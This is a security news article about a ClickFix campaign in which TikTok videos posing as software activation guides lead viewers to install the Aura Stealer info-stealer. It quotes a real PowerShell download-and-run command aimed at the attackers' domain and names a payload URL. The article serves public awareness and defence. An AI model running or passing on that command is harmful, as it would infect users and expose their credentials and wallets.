In a disturbing trend, cybercriminals are leveraging popular platforms like TikTok to spread information-stealing malware through videos disguised as free activation guides for well-known software. This ongoing campaign was recently identified by ISC Handler Xavier Mertens and mirrors tactics previously observed in May by security firm Trend Micro.
The TikTok videos, reported by BleepingComputer, masquerade as instructional content aimed at helping users activate legitimate products such as Windows, Microsoft 365, Adobe Premiere, Photoshop, CapCut Pro, and Discord Nitro. Additionally, they also target fictitious services like Netflix and Spotify Premium. These videos deploy a technique known as a ClickFix attack, which is a form of social engineering designed to trick users into executing harmful PowerShell commands or scripts.
Each video presents a brief command and instructs viewers to execute it with administrative privileges in PowerShell. An example command is: iex (irm slmgr.win/photoshop). Notably, the program name in the URL varies according to the software being impersonated. For instance, in videos claiming to activate Windows, the URL would replace "photoshop" with "windows."
When users run these commands, PowerShell connects to the remote site slmgr.win to retrieve and execute another PowerShell script. This script is responsible for downloading two executables from Cloudflare pages. The first executable, available at https://file-epq.pages.dev/updater.exe, is identified as a variant of the Aura Stealer info-stealing malware.
Aura Stealer is particularly dangerous as it collects sensitive information, including saved credentials from web browsers, authentication cookies, cryptocurrency wallet details, and other application credentials. Once gathered, this information is uploaded to the attackers, granting them unauthorized access to users' accounts.
Mertens also pointed out that an additional payload, named source.exe, is downloaded during this attack. This executable utilizes .NET's built-in Visual C Compiler (csc.exe) to self-compile code, which is then injected and executed in memory. The exact purpose of this additional payload remains uncertain, further emphasizing the risks associated with these attacks.
Users who have executed any of these commands should consider all their credentials compromised. It is crucial to reset passwords across all platforms they frequent immediately. As ClickFix attacks gain traction, they are increasingly being used to distribute various malware strains, contributing to ransomware and cryptocurrency theft campaigns.
To protect yourself from such cyber threats, stay informed about the latest scams and always verify the legitimacy of any software activation guides you come across on social media platforms like TikTok. Awareness is your best defense against becoming a victim of cybercrime.
